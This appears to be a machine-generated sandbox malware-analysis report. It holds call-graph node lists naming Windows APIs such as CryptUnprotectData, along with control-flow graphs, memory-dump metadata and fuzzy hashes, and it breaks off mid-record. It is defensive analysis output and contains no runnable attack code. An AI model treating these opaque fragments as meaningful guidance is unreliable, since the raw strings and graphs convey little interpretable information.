42681->42683 42682->42683 42686 348ad540 CryptUnprotectData 42682->42686 42687 348ad550 CryptUnprotectData 42682->42687 42684 348ad1ec CryptUnprotectData 42683->42684 42685 348ad7f5 42684->42685 42685->42671 42686->42683 42687->42683 42689 348ad9e0 CryptUnprotectData 42688->42689 42690 348ad7f5 42689->42690 42690->42671 42692 37b60948 42691->42692 42693 37b60965 42692->42693 42699 37b60980 42692->42699 42695 37b6188c 42693->42695 42697 37b61897 42695->42697 42698 37b62866 42697->42698 42722 37b61934 42697->42722 42700 37b609c6 GetCurrentProcess 42699->42700 42702 37b60a11 42700->42702 42703 37b60a18 GetCurrentThread 42700->42703 42702->42703 42704 37b60a55 GetCurrentProcess 42703->42704 42705 37b60a4e 42703->42705 42706 37b60a8b 42704->42706 42705->42704 42711 37b60f31 42706->42711 42713 37b60b4f 42706->42713 42707 37b60ab3 GetCurrentThreadId 42708 37b60ae4 42707->42708 42708->42693 42712 37b60f3a 42711->42712 42712->42707 42717 37b60bc0 42713->42717 42720 37b60bc8 DuplicateHandle 42713->42720 42714 37b60b8e 42714->42707 42718 37b60bc8 DuplicateHandle 42717->42718 42719 37b60c5e 42718->42719 42719->42714 42721 37b60c5e 42720->42721 42721->42714 42728 37b6193f 42722->42728 42723 37b62e79 42724 37b62ea9 42723->42724 42725 37b62ac4 7 API calls 42723->42725 42729 37b62ed4 42724->42729 42737 37b62ac4 42724->42737 42725->42724 42727 37b62ec1 42727->42729 42743 37b6d5f8 42727->42743 42750 37b6d608 42727->42750 42728->42723 42728->42729 42733 37b63e40 42728->42733 42729->42697 42734 37b63e61 42733->42734 42735 37b63e85 42734->42735 42757 37b63ff0 42734->42757 42735->42723 42738 37b62acf 42737->42738 42739 37b60938 6 API calls 42738->42739 42742 37b6d0a1 42738->42742 42740 37b6d0bb 42739->42740 42826 37b6c544 42740->42826 42742->42727 42749 37b6d608 42743->42749 42744 37b6d899 42745 37b60938 6 API calls 42744->42745 42747 37b6d6ba 42745->42747 42746 37b6dad0 WaitMessage 42746->42749 42747->42729 42749->42744 42749->42746 42749->42747 42833 37b6c60c 42749->42833 42756 37b6d66d 42750->42756 42751 37b6d899 42752 37b60938 6 API calls 42751->42752 42754 37b6d6ba 42752->42754 42753 37b6dad0 WaitMessage 42753->42756 42754->42729 42755 37b6c60c DispatchMessageW 42755->42756 42756->42751 42756->42753 42756->42754 42756->42755 42758 37b63ffd 42757->42758 42759 37b60938 6 API calls 42758->42759 42760 37b6402b 42759->42760 42761 37b64036 42760->42761 42763 37b62bec 42760->42763 42761->42735 42764 37b62bf7 42763->42764 42765 37b640a8 42764->42765 42767 37b62c20 42764->42767 42768 37b62c2b 42767->42768 42780 37b62c30 42768->42780 42770 37b64517 42784 37b640f8 42770->42784 42772 37b64540 42789 37b64108 42772->42789 42774 37b64547 42793 37b691f0 42774->42793 42799 37b69067 42774->42799 42807 37b68400 42774->42807 42815 37b691d8 42774->42815 42775 37b64551 42775->42765 42781 37b62c3b 42780->42781 42782 37b657a0 42781->42782 42783 37b63e40 8 API calls 42781->42783 42782->42770 42783->42782 42787 37b64103 42784->42787 42786 37b689d3 42786->42772 42788 37b689d8 42787->42788 42822 37b68308 42787->42822 42788->42772 42790 37b64113 42789->42790 42791 37b68400 2 API calls 42790->42791 42792 37b6901f 42791->42792 42792->42774 42795 37b69221 42793->42795 42796 37b69321 42793->42796 42794 37b6922d 42794->42775 42795->42794 42797 3763faa1 2 API calls 42795->42797 42798 3763fab0 2 API calls 42795->42798 42796->42775 42797->42796 42798->42796 42802 37b69076 42799->42802 42800 37b691c8 42800->42775 42801 37b68400 2 API calls 42801->42802 42802->42800 42802->42801 42803 37b691ea 42802->42803 42804 37b6922d 42803->42804 42805 3763faa1 2 API calls 42803->42805 42806 3763fab0 2 API calls 42803->42806 42804->42775 42805->42804 42806->42804 42811 37b6840b 42807->42811 42808 37b691c8 42808->42775 42809 37b691ea 42812 37b6922d 42809->42812 42813 3763faa1 2 API calls 42809->42813 42814 3763fab0 2 API calls 42809->42814 42810 37b68400 2 API calls 42810->42811 42811->42808 42811->42809 42811->42810 42812->42775 42813->42812 42814->42812 42816 37b6915d 42815->42816 42818 37b691ea 42815->42818 42816->42815 42817 37b68400 2 API calls 42816->42817 42817->42816 42819 37b6922d 42818->42819 42820 3763faa1 2 API calls 42818->42820 42821 3763fab0 2 API calls 42818->42821 42819->42775 42820->42819 42821->42819 42823 37b68313 42822->42823 42824 37b64108 2 API calls 42823->42824 42825 37b68b55 42823->42825 42824->42825 42825->42786 42827 37b6c54f 42826->42827 42828 37b6d3bb 42827->42828 42830 37b6c560 42827->42830 42828->42742 42831 37b6d3f0 OleInitialize 42830->42831 42832 37b6d454 42831->42832 42832->42828 42834 37b6e708 DispatchMessageW 42833->42834 42835 37b6e774 42834->42835 42835->42749 42556 3763ce60 42557 3763ce7c 42556->42557 42560 376394b4 42557->42560 42559 3763ce9b 42561 376394bf 42560->42561 42562 3763cf4f 42561->42562 42565 3763cf59 42561->42565 42569 3763cf68 42561->42569 42562->42559 42567 3763cf67 42565->42567 42566 3763d021 42566->42566 42567->42566 42573 376395e8 42567->42573 42571 3763cf7f 42569->42571 42570 3763d021 42571->42570 42572 376395e8 2 API calls 42571->42572 42572->42570 42574 376395f3 42573->42574 42576 3763ec47 42574->42576 42577 3763e7f4 42574->42577 42576->42566 42579 3763e7ff 42577->42579 42578 3763f111 42578->42576 42579->42578 42582 3763faa1 42579->42582 42586 3763fab0 42579->42586 42583 3763fab0 42582->42583 42584 3763fb8a 42583->42584 42590 37b600c0 42583->42590 42587 3763fadb 42586->42587 42588 3763fb8a 42587->42588 42589 37b600c0 2 API calls 42587->42589 42589->42588 42594 37b60104 42590->42594 42598 37b60110 42590->42598 42595 37b60110 CreateWindowExW 42594->42595 42597 37b60234 42595->42597 42597->42597 42599 37b60178 CreateWindowExW 42598->42599 42601 37b60234 42599->42601 42601->42601 42836 37b620c0 42839 37b620ed 42836->42839 42837 37b6213c 42837->42837 42839->42837 42840 37b617fc 42839->42840 42841 37b61807 42840->42841 42846 37b617d0 42841->42846 42843 37b6229c 42845 376395e8 2 API calls 42843->42845 42844 37b622a5 42844->42837 42845->42844 42847 37b617db 42846->42847 42850 37b6181c 42847->42850 42849 37b622f5 42849->42843 42851 37b61827 42850->42851 42852 37b62461 GetCurrentThreadId 42851->42852 42853 37b6248b 42851->42853 42852->42853 42853->42849 42854 37b62020 SetTimer 42855 37b6208c 42854->42855 42856 ad030 42857 ad048 42856->42857 42858 ad0a2 42857->42858 42864 37b602b7 42857->42864 42869 37b602c8 42857->42869 42874 37b61bc0 42857->42874 42878 37b61bd0 42857->42878 42882 37b603f0 42857->42882 42865 37b602c8 42864->42865 42867 37b61bd0 2 API calls 42865->42867 42868 37b61bc0 2 API calls 42865->42868 42866 37b6030f 42866->42858 42867->42866 42868->42866 42870 37b602ee 42869->42870 42872 37b61bd0 2 API calls 42870->42872 42873 37b61bc0 2 API calls 42870->42873 42871 37b6030f 42871->42858 42872->42871 42873->42871 42875 37b61bd0 42874->42875 42876 37b61c2f 42875->42876 42885 37b61d58 42875->42885 42880 37b61bfd 42878->42880 42879 37b61c2f 42880->42879 42881 37b61d58 2 API calls 42880->42881 42881->42879 42883 37b60407 42882->42883 42898 37b60841 42882->42898 42883->42858 42886 37b61d66 42885->42886 42887 37b61d93 42885->42887 42888 37b61d6e 42886->42888 42894 37b61dc0 42886->42894 42887->42886 42889 37b61d98 42887->42889 42888->42876 42890 37b617d0 GetCurrentThreadId 42889->42890 42891 37b61da4 42890->42891 42891->42876 42895 37b61e02 42894->42895 42897 37b61dac 42894->42897 42896 37b61e5a CallWindowProcW 42895->42896 42895->42897 42896->42897 42897->42876 42899 37b60856 42898->42899 42900 37b60938 6 API calls 42898->42900 42899->42883 42900->42899 42602 348a7ee4 42603 348a7ef3 42602->42603 42605 348a7e7d 42602->42605 42603->42605 42607 348a82a6 42603->42607 42608 348a7628 42603->42608 42606 348a7628 LdrInitializeThunk 42606->42607 42607->42605 42607->42606 42609 348a763a 42608->42609 42611 348a763f 42608->42611 42609->42607 42610 348a7d69 LdrInitializeThunk 42610->42609 42611->42609 42611->42610

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 1666b8-1666ed 1 1666f3-166716 0->1 2 166b1c-166b20 0->2 11 1667c4-1667c8 1->11 12 16671c-166729 1->12 3 166b22-166b36 2->3 4 166b39-166b47 2->4 9 166bb8-166bcd 4->9 10 166b49-166b5e 4->10 17 166bd4-166be1 9->17 18 166bcf-166bd2 9->18 19 166b65-166b72 10->19 20 166b60-166b63 10->20 15 166810-166819 11->15 16 1667ca-1667d8 11->16 24 16672b-166736 12->24 25 166738 12->25 21 166c2f 15->21 22 16681f-166829 15->22 16->15 36 1667da-1667f5 16->36 26 166be3-166c1e 17->26 18->26 27 166b74-166bb5 19->27 20->27 30 166c34-166c4d 21->30 22->2 28 16682f-166838 22->28 31 16673a-16673c 24->31 25->31 70 166c25-166c2c 26->70 34 166847-166853 28->34 35 16683a-16683f 28->35 31->11 38 166742-1667a4 31->38 34->30 41 166859-16685f 34->41 35->34 57 1667f7-166801 36->57 58 166803 36->58 82 1667a6 38->82 83 1667aa-1667c1 38->83 43 166b06-166b0a 41->43 44 166865-166875 41->44 43->21 47 166b10-166b16 43->47 55 166877-166887 44->55 56 166889-16688b 44->56 47->2 47->28 59 16688e-166894 55->59 56->59 60 166805-166807 57->60 58->60 59->43 63 16689a-1668a9 59->63 60->15 64 166809 60->64 68 166957-166982 call 166500 * 2 63->68 69 1668af 63->69 64->15 86 166a6c-166a86 68->86 87 166988-16698c 68->87 72 1668b2-1668c3 69->72 72->30 75 1668c9-1668db 72->75 75->30 77 1668e1-1668fb call 166c98 75->77 81 166901-166911 77->81 81->43 85 166917-16691a 81->85 82->83 83->11 88 166924-166927 85->88 89 16691c-166922 85->89 86->2 109 166a8c-166a90 86->109 87->43 91 166992-166996 87->91 88->21 92 16692d-166930 88->92 89->88 89->92 94 1669be-1669c4 91->94 95 166998-1669a5 91->95 96 166932-166936 92->96 97 166938-16693b 92->97 99 1669c6-1669ca 94->99 100 1669ff-166a05 94->100 112 1669a7-1669b2 95->112 113 1669b4 95->113 96->97 98 166941-166945 96->98 97->21 97->98 98->21 101 16694b-166951 98->101 99->100 102 1669cc-1669d5 99->102 103 166a07-166a0b 100->103 104 166a11-166a17 100->104 101->68 101->72 107 1669d7-1669dc 102->107 108 1669e4-1669fa 102->108 103->70 103->104 110 166a23-166a25 104->110 111 166a19-166a1d 104->111 107->108 108->43 117 166a92-166a9c call 1653a8 109->117 118 166acc-166ad0 109->118 114 166a27-166a30 110->114 115 166a5a-166a5c 110->115 111->43 111->110 116 1669b6-1669b8 112->116 113->116 121 166a32-166a37 114->121 122 166a3f-166a55 114->122 115->43 123 166a62-166a69 115->123 116->43 116->94 117->118 128 166a9e-166ab3 117->128 118->70 125 166ad6-166ada 118->125 121->122 122->43 125->70 127 166ae0-166aed 125->127 131 166aef-166afa 127->131 132 166afc 127->132 128->118 137 166ab5-166aca 128->137 134 166afe-166b00 131->134 132->134 134->43 134->70 137->2 137->118
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                                                                              • API String ID: 0-1435242062
                                                                                                              • Opcode ID: e71507e08c3da2918d697906fe967e80bc0538e97a4003aa244e5ffff821537d
                                                                                                              • Instruction ID: e8f5e52e2b2953c63d735edec472311b93badc3c2384b8e9c79c99e116a80325
                                                                                                              • Opcode Fuzzy Hash: e71507e08c3da2918d697906fe967e80bc0538e97a4003aa244e5ffff821537d
                                                                                                              • Instruction Fuzzy Hash: A6127D30A00609DFCB14CF69D984AAEBBF6FF88314F158569E849EB265DB30ED51CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 141 1619b8-161a13 145 161a35-161a84 141->145 146 161a15-161a34 141->146 150 161a86-161a8d 145->150 151 161a9f 145->151 152 161a96-161a9d 150->152 153 161a8f-161a94 150->153 155 161aa7 151->155 154 161aaa-161abe 152->154 153->154 157 161ad4-161adc 154->157 158 161ac0-161ac7 154->158 155->154 161 161ade-161ae2 157->161 159 161acd-161ad2 158->159 160 161ac9-161acb 158->160 159->161 160->161 163 161ae4-161af9 161->163 164 161b42-161b45 161->164 163->164 171 161afb-161afe 163->171 165 161b47-161b5c 164->165 166 161b8d-161b93 164->166 165->166 173 161b5e-161b62 165->173 168 16268e 166->168 169 161b99-161b9b 166->169 176 162693-162ca1 168->176 169->168 172 161ba1-161ba6 169->172 174 161b00-161b02 171->174 175 161b1d-161b3b call 1602a8 171->175 177 16263c-162640 172->177 178 161bac 172->178 179 161b64-161b68 173->179 180 161b6a-161b88 call 1602a8 173->180 174->175 181 161b04-161b07 174->181 175->164 201 162cb2-162cba 176->201 202 162ca3-162ca5 176->202 183 162647-16268d 177->183 184 162642-162645 177->184 178->177 179->166 179->180 180->166 181->164 186 161b09-161b1b 181->186 184->176 184->183 186->164 186->175 205 162cbc-162cca 201->205 203 162ca7-162ca9 202->203 204 162cab-162cb0 202->204 203->205 204->205 208 162ce0-162ce8 205->208 209 162ccc-162cce 205->209 212 162ceb-162cee 208->212 210 162cd7-162cde 209->210 211 162cd0-162cd5 209->211 210->212 211->212 214 162d05-162d09 212->214 215 162cf0-162cfe 212->215 216 162d22-162d25 214->216 217 162d0b-162d19 214->217 215->214 222 162d00 215->222 219 162d27-162d2b 216->219 220 162d2d-162d62 216->220 217->216 227 162d1b 217->227 219->220 221 162d64-162d7b 219->221 228 162dc4-162dc9 220->228 225 162d81-162d8d 221->225 226 162d7d-162d7f 221->226 222->214 229 162d97-162da1 225->229 230 162d8f-162d95 225->230 226->228 227->216 232 162da9 229->232 233 162da3 229->233 230->232 234 162db1-162dbd 232->234 233->232 234->228
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Xaq$Xaq$Xaq$Xaq$Xaq$Xaq
                                                                                                              • API String ID: 0-499371476
                                                                                                              • Opcode ID: 2522a57f8b7a23caef53089114bc366b6b0297396e0958ab02a26fe34e33149c
                                                                                                              • Instruction ID: 9e9e96881825fe7c244583887e457e62831d8a4aa48d04654649fed7a6b5b9ee
                                                                                                              • Opcode Fuzzy Hash: 2522a57f8b7a23caef53089114bc366b6b0297396e0958ab02a26fe34e33149c
                                                                                                              • Instruction Fuzzy Hash: DA724D2960D3D29FDB224F305CFB595BFE09E4314476D0ADEE0C1660A3DAA987A9C313

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 323 165f90-165fc6 453 165fc8 call 165f90 323->453 454 165fc8 call 1660e0 323->454 324 165fce-165fd4 325 165fd6-165fda 324->325 326 166024-166028 324->326 329 165fdc-165fe1 325->329 330 165fe9-165ff0 325->330 327 16603f-166053 326->327 328 16602a-166039 326->328 451 166055 call 168da0 327->451 452 166055 call 1690a8 327->452 331 166065-16606f 328->331 332 16603b-16603d 328->332 329->330 333 1660c6-166103 330->333 334 165ff6-165ffd 330->334 336 166071-166077 331->336 337 166079-16607d 331->337 335 16605b-166062 332->335 345 166105-16610b 333->345 346 16610e-16612e 333->346 334->326 338 165fff-166003 334->338 339 166085-1660bf 336->339 337->339 341 16607f 337->341 342 166005-16600a 338->342 343 166012-166019 338->343 339->333 341->339 342->343 343->333 344 16601f-166022 343->344 344->335 345->346 351 166135-16613c 346->351 352 166130 346->352 355 16613e-166149 351->355 354 1664c4-1664cd 352->354 356 1664d5-166511 355->356 357 16614f-166162 355->357 366 166513-166518 356->366 367 16651a-16651e 356->367 362 166164-166172 357->362 363 166178-166193 357->363 362->363 369 16644c-166453 362->369 371 1661b7-1661ba 363->371 372 166195-16619b 363->372 370 166524-166525 366->370 367->370 369->354 373 166455-166457 369->373 374 166314-16631a 371->374 375 1661c0-1661c3 371->375 376 1661a4-1661a7 372->376 377 16619d 372->377 380 166466-16646c 373->380 381 166459-16645e 373->381 378 166406-166409 374->378 383 166320-166325 374->383 375->374 384 1661c9-1661cf 375->384 379 1661da-1661e0 376->379 382 1661a9-1661ac 376->382 377->374 377->376 377->378 377->379 389 1664d0 378->389 390 16640f-166415 378->390 391 1661e6-1661e8 379->391 392 1661e2-1661e4 379->392 380->356 387 16646e-166473 380->387 381->380 385 166246-16624c 382->385 386 1661b2 382->386 383->378 384->374 388 1661d5 384->388 385->378 395 166252-166258 385->395 386->378 393 166475-16647a 387->393 394 1664b8-1664bb 387->394 388->378 389->356 396 166417-16641f 390->396 397 16643a-16643e 390->397 398 1661f2-1661fb 391->398 392->398 393->389 400 16647c 393->400 394->389 399 1664bd-1664c2 394->399 401 16625e-166260 395->401 402 16625a-16625c 395->402 396->356 403 166425-166434 396->403 397->369 406 166440-166446 397->406 404 16620e-166236 398->404 405 1661fd-166208 398->405 399->354 399->373 407 166483-166488 400->407 408 16626a-166281 401->408 402->408 403->363 403->397 426 16623c-166241 404->426 427 16632a-166360 404->427 405->378 405->404 406->355 406->369 410 1664aa-1664ac 407->410 411 16648a-16648c 407->411 420 166283-16629c 408->420 421 1662ac-1662d3 408->421 410->389 417 1664ae-1664b1 410->417 414 16648e-166493 411->414 415 16649b-1664a1 411->415 414->415 415->356 419 1664a3-1664a8 415->419 417->394 419->410 422 16647e-166481 419->422 420->427 430 1662a2-1662a7 420->430 421->389 432 1662d9-1662dc 421->432 422->389 422->407 426->427 433 166362-166366 427->433 434 16636d-166375 427->434 430->427 432->389 435 1662e2-16630b 432->435 436 166385-166389 433->436 437 166368-16636b 433->437 434->389 438 16637b-166380 434->438 435->427 450 16630d-166312 435->450 439 16638b-166391 436->439 440 1663a8-1663ac 436->440 437->434 437->436 438->378 439->440 444 166393-16639b 439->444 442 1663b6-1663d5 call 1666b8 440->442 443 1663ae-1663b4 440->443 445 1663db-1663df 442->445 443->442 443->445 444->389 446 1663a1-1663a6 444->446 445->378 448 1663e1-1663fd 445->448 446->378 448->378 450->427 451->335 452->335 453->324 454->324
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                                                                              • API String ID: 0-615190528
                                                                                                              • Opcode ID: da744473ceab79fcfd8f2cb53b8b563f372089c69d0db11dbba68bdae46d873d
                                                                                                              • Instruction ID: ec92719618b90807f9ccffd684469bb738f915649950b51fc308105c30eb1bb6
                                                                                                              • Opcode Fuzzy Hash: da744473ceab79fcfd8f2cb53b8b563f372089c69d0db11dbba68bdae46d873d
                                                                                                              • Instruction Fuzzy Hash: CE123C31A00219DFCB15CFA9DD94AAEBBF6FF89304F158069E805AB265DB30ED51CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 542 164328-164368 544 16436f-16444c call 163168 call 162c88 542->544 545 16436a 542->545 555 164453-164471 544->555 556 16444e 544->556 545->544 586 164474 call 164664 555->586 587 164474 call 164620 555->587 556->555 557 16447a-164485 558 164487 557->558 559 16448c-164490 557->559 558->559 560 164495-16449c 559->560 561 164492-164493 559->561 563 1644a3-1644b1 560->563 564 16449e 560->564 562 1644b4-1644f8 561->562 568 16455e-164575 562->568 563->562 564->563 570 164577-16459c 568->570 571 1644fa-164510 568->571 577 1645b4 570->577 578 16459e-1645b3 570->578 575 164512-16451e 571->575 576 16453a 571->576 579 164520-164526 575->579 580 164528-16452e 575->580 581 164540-16455d 576->581 578->577 582 164538 579->582 580->582 581->568 582->581 586->557 587->557
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0o@p$Lj@p$Lj@p$PH]q$PH]q
                                                                                                              • API String ID: 0-1229222154
                                                                                                              • Opcode ID: 4759b6b8ef89055f420e3598210a34dc2402abf38e5cd4186f16b42a46953ca5
                                                                                                              • Instruction ID: b3b5a7d52f8539e50fc1cad73c46142e6192d64608bfe2346ac4dc32f4730ea8
                                                                                                              • Opcode Fuzzy Hash: 4759b6b8ef89055f420e3598210a34dc2402abf38e5cd4186f16b42a46953ca5
                                                                                                              • Instruction Fuzzy Hash: 7091E774E00218DFDB18DFA9D984A9DBBF2BF89300F14C06AE809AB365DB349945CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3283558363.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_160000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o]q$4']q$4']q$4']q
                                                                                                              • API String ID: 0-875651895
                                                                                                              • Opcode ID: 79bfcda0152bd8f235ed1d61da63aa4e3343eb2befd0989ecc045001c64ebbcc
                                                                                                              • Instruction ID: ffc6931d1ab0ee11f5e198a91a1f9e8db39785ac29022e41154af7560d7da6a3
                                                                                                              • Opcode Fuzzy Hash: 79bfcda0152bd8f235ed1d61da63aa4e3343eb2befd0989ecc045001c64ebbcc
                                                                                                              • Instruction Fuzzy Hash: DEA28E71A04209DFCB15CFA8C994AAEBBF6BF88310F15856AE405DB361DB31ED51CB90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1064 37b6d608-37b6d66b 1065 37b6d66d-37b6d697 1064->1065 1066 37b6d69a-37b6d6b8 1064->1066 1065->1066 1071 37b6d6c1-37b6d6f8 1066->1071 1072 37b6d6ba-37b6d6bc 1066->1072 1076 37b6d6fe-37b6d712 1071->1076 1077 37b6db29 1071->1077 1073 37b6db7a-37b6db8f 1072->1073 1078 37b6d714-37b6d73e 1076->1078 1079 37b6d741-37b6d760 1076->1079 1080 37b6db2e-37b6db44 1077->1080 1078->1079 1086 37b6d762-37b6d768 1079->1086 1087 37b6d778-37b6d77a 1079->1087 1080->1073 1088 37b6d76c-37b6d76e 1086->1088 1089 37b6d76a 1086->1089 1090 37b6d77c-37b6d794 1087->1090 1091 37b6d799-37b6d7a2 1087->1091 1088->1087 1089->1087 1090->1080 1093 37b6d7aa-37b6d7b1 1091->1093 1094 37b6d7b3-37b6d7b9 1093->1094 1095 37b6d7bb-37b6d7c2 1093->1095 1096 37b6d7cf-37b6d7ec call 37b6c5c0 1094->1096 1097 37b6d7c4-37b6d7ca 1095->1097 1098 37b6d7cc 1095->1098 1101 37b6d7f2-37b6d7f9 1096->1101 1102 37b6d941-37b6d945 1096->1102 1097->1096 1098->1096 1101->1077 1103 37b6d7ff-37b6d83c 1101->1103 1104 37b6db14-37b6db27 1102->1104 1105 37b6d94b-37b6d94f 1102->1105 1113 37b6d842-37b6d847 1103->1113 1114 37b6db0a-37b6db0e 1103->1114 1104->1080 1106 37b6d951-37b6d964 1105->1106 1107 37b6d969-37b6d972 1105->1107 1106->1080 1109 37b6d974-37b6d99e 1107->1109 1110 37b6d9a1-37b6d9a8 1107->1110 1109->1110 1111 37b6da47-37b6da5c 1110->1111 1112 37b6d9ae-37b6d9b5 1110->1112 1111->1114 1123 37b6da62-37b6da64 1111->1123 1115 37b6d9b7-37b6d9e1 1112->1115 1116 37b6d9e4-37b6da06 1112->1116 1117 37b6d879-37b6d88e call 37b6c5e4 1113->1117 1118 37b6d849-37b6d857 call 37b6c5cc 1113->1118 1114->1093 1114->1104 1115->1116 1116->1111 1152 37b6da08-37b6da12 1116->1152 1127 37b6d893-37b6d897 1117->1127 1118->1117 1131 37b6d859-37b6d877 call 37b6c5d8 1118->1131 1129 37b6da66-37b6da9f 1123->1129 1130 37b6dab1-37b6dace call 37b6c5c0 1123->1130 1132 37b6d908-37b6d915 1127->1132 1133 37b6d899-37b6d8ab call 37b60938 call 37b6c5f0 1127->1133 1147 37b6daa1-37b6daa7 1129->1147 1148 37b6daa8-37b6daaf 1129->1148 1130->1114 1150 37b6dad0-37b6dafc WaitMessage 1130->1150 1131->1127 1132->1114 1151 37b6d91b-37b6d925 call 37b6c600 1132->1151 1158 37b6d8ad-37b6d8dd 1133->1158 1159 37b6d8eb-37b6d903 1133->1159 1147->1148 1148->1114 1154 37b6db03 1150->1154 1155 37b6dafe 1150->1155 1161 37b6d927-37b6d92a call 37b6c60c 1151->1161 1162 37b6d934-37b6d93c call 37b6c618 1151->1162 1166 37b6da14-37b6da1a 1152->1166 1167 37b6da2a-37b6da45 1152->1167 1154->1114 1155->1154 1173 37b6d8e4 1158->1173 1174 37b6d8df 1158->1174 1159->1080 1169 37b6d92f 1161->1169 1162->1114 1171 37b6da1e-37b6da20 1166->1171 1172 37b6da1c 1166->1172 1167->1111 1167->1152 1169->1114 1171->1167 1172->1167 1173->1159 1174->1173
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID: <0]4
                                                                                                              • API String ID: 2061451462-2440276537
                                                                                                              • Opcode ID: 46924871a18cb2784ef6d6b61eabcc11bc5843cd89b35cc0e682323135f16a5a
                                                                                                              • Instruction ID: 3052bb0aea90b0cb9440f4b9c064bbd893d602e1aae93ecbfc0a7fd62794bfdd
                                                                                                              • Opcode Fuzzy Hash: 46924871a18cb2784ef6d6b61eabcc11bc5843cd89b35cc0e682323135f16a5a
                                                                                                              • Instruction Fuzzy Hash: 62F18B74A003089FEB04DFA9C888BADBBF1FF84358F148569E508BB265DB74E945CB40
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 740ec5d58d5c989b854a359bb0942d56c06d5dbe01c87251bb11a197b2eb0445
                                                                                                              • Instruction ID: f3a958d456c5622d7c8ad109531d197d00f6924b344782ed6b0c2c10e981ce11
                                                                                                              • Opcode Fuzzy Hash: 740ec5d58d5c989b854a359bb0942d56c06d5dbe01c87251bb11a197b2eb0445
                                                                                                              • Instruction Fuzzy Hash: 84222774E00218CFDB14DFA8C890B9DBBB2BF88300F5486A9D409AB355DB75D986CF50
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te]q
                                                                                                              • API String ID: 0-52440209
                                                                                                              • Opcode ID: bc2f304ccb6b584eeb96362a77d4711ba1ef354b822c0bb923dfa6f4622beb8d
                                                                                                              • Instruction ID: c512b042494bf320930eefe8228232f4584100a94e26895cba9893095c14b198
                                                                                                              • Opcode Fuzzy Hash: bc2f304ccb6b584eeb96362a77d4711ba1ef354b822c0bb923dfa6f4622beb8d
                                                                                                              • Instruction Fuzzy Hash: BB82C174A01228CFDB25DF64D994BA9B7B2FF89300F1085E9D90967365CB35AE82CF44
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.3308592654.0000000037630000.00000040.00000800.00020000.00000000.sdmp, Offset: 37630000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_37630000_2CQ2zMn0hb.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te]q
                                                                                                              • API String ID: 0-52440209
                                                                                                              • Opcode ID: a554dbcebaabaa4f51c6415d88becc079abade110435ed80829e1ea11b5f5cfa
                                                                                                              • Instruction ID: 475d6629a293f4074b9a0e6ea63568d3350b703b471dfce8d919d0b48cc5b0f7
